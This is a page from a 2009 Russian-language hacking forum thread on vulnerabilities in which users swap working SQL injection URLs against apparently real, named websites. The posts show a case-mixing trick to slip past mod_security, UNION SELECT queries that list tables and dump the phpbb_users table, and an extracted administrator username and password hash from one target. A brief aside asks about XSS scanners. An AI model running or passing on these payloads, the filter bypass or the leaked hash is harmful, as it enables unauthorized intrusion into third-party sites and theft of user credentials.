ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
 
Страница 728 из 1393 « Первая < 228628678718 724 725 726 727 728 729 730 731 732 7387788281228 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #7271  
Старый 20.05.2009, 22:27
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию
PaCo, сразу видно, что инъекций ты мало крутил ^^
Спорим, прокатит?
 

  #7272  
Старый 20.05.2009, 22:31
PaCo
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
Провел на форуме:
1754802

Репутация: 380
По умолчанию
Цитата:
Сообщение от R1dex  
PaCo, сразу видно, что инъекций ты мало крутил ^^
Спорим, прокатит?
http://www.opennet.ru/base/sec/mod_security2.txt.html, я тебе не про сам скрипт говорю, а про модуль апача.
 

  #7273  
Старый 20.05.2009, 22:35
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию
2 PaCo

Не прокатывает:
http://gurtskaya.ru/text_press_year.php?send=ok&year=&cat='+union+sele ct+1,2,table_name,4,5,6,7+from+information_schema. tables--+

Прокатывает:
http://gurtskaya.ru/text_press_year.php?send=ok&year=&cat='+union+sele ct+1,2,TaBle_naMe,4,5,6,7+from+inForMatiOn_sCheMa. taBLes--+

Кстати возможно я угадал с сайтом ^^
 

  #7274  
Старый 20.05.2009, 22:37
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию
Да, с сайтом угадал.. Прокатывает и просто:

http://gurtskaya.ru/text_press_year.php?send=ok&year=&cat='+union+sele ct+1,2,table_name,4,5,6,7+from+information_schema. Tables--+
 

  #7275  
Старый 20.05.2009, 22:38
PaCo
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
Провел на форуме:
1754802

Репутация: 380
По умолчанию
да я кокраз его крутил тоже(он один и вылазиет с гугл text_press_year.php), значит так настроен mod_security
 

  #7276  
Старый 20.05.2009, 23:22
cupper
Постоянный
Регистрация: 06.06.2007
Сообщений: 575
Провел на форуме:
1180737

Репутация: 180


По умолчанию
еще по XSS.
1) есть наиболее удачные сканеры XSS, только чтонибуть актуальное а не 3 летней выдержки.
2) такие сканеры могут сканить только поссивные XSS ?? Есть ли сканеры активных XSS, если есть то как они работают ?
 

  #7277  
Старый 20.05.2009, 23:34
ph1l1ster
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
Провел на форуме:
2075230

Репутация: 462
Отправить сообщение для ph1l1ster с помощью ICQ
По умолчанию
Цитата:
Сообщение от cupper  
еще по XSS.
1) есть наиболее удачные сканеры XSS, только чтонибуть актуальное а не 3 летней выдержки.
2) такие сканеры могут сканить только поссивные XSS ?? Есть ли сканеры активных XSS, если есть то как они работают ?

руками хсс искать удобней. имхо
 

  #7278  
Старый 21.05.2009, 08:05
pelligrim
Познающий
Регистрация: 26.04.2008
Сообщений: 31
Провел на форуме:
31474

Репутация: 53
По умолчанию
Народ, помогите насчет скули! И было бы не плохо если бы еще и объяснили почему так...

Код HTML:
http://193.109.129.190/index.php?page=text&menu=5&sub=-54+union+select+1,2,3,4,5,6,7+from+bertie.phpbb_users--
Скуля 5
колонки : phpbb_usersbertieusername, phpbb_usersbertieuser_password - существуют, а ничего не выводится

Пробывал связки cast(****+as+binary), convert(****+using+latin1), unhex(hex(*****))
и ничего, все то же самое...
 

  #7279  
Старый 21.05.2009, 08:30
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию
http://193.109.129.190/index.php?page=text&menu=5&sub=-54+union+select+1,column_name,3,4,5,6,7+from+infor mation_schema.columns+where+table_name=0x706870626 25F7573657273--

http://193.109.129.190/index.php?page=text&menu=5&sub=-54+union+select+1,concat_ws(0x3a,username,user_pas sword),3,4,5,6,7+from+bertie.phpbb_users--

думаю требуется это:
admin:$H$9LZ00OBCgmEv2A6/.0VbvqUiJUeNE60
 

  #7280  
Старый 21.05.2009, 09:17
pelligrim
Познающий
Регистрация: 26.04.2008
Сообщений: 31
Провел на форуме:
31474

Репутация: 53
По умолчанию
Цитата:
Сообщение от AlexSatter  
http://193.109.129.190/index.php?page=text&menu=5&sub=-54+union+select+1,column_name,3,4,5,6,7+from+infor mation_schema.columns+where+table_name=0x706870626 25F7573657273--

http://193.109.129.190/index.php?page=text&menu=5&sub=-54+union+select+1,concat_ws(0x3a,username,user_pas sword),3,4,5,6,7+from+bertie.phpbb_users--

думаю требуется это:
admin:$H$9LZ00OBCgmEv2A6/.0VbvqUiJUeNE60

тьху, спс, протупил... просто забыл поставить разделитель 0x3a к примеру, а то все слилось у меня и shema и table и column
 
 
Страница 728 из 1393 « Первая < 228628678718 724 725 726 727 728 729 730 731 732 7387788281228 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ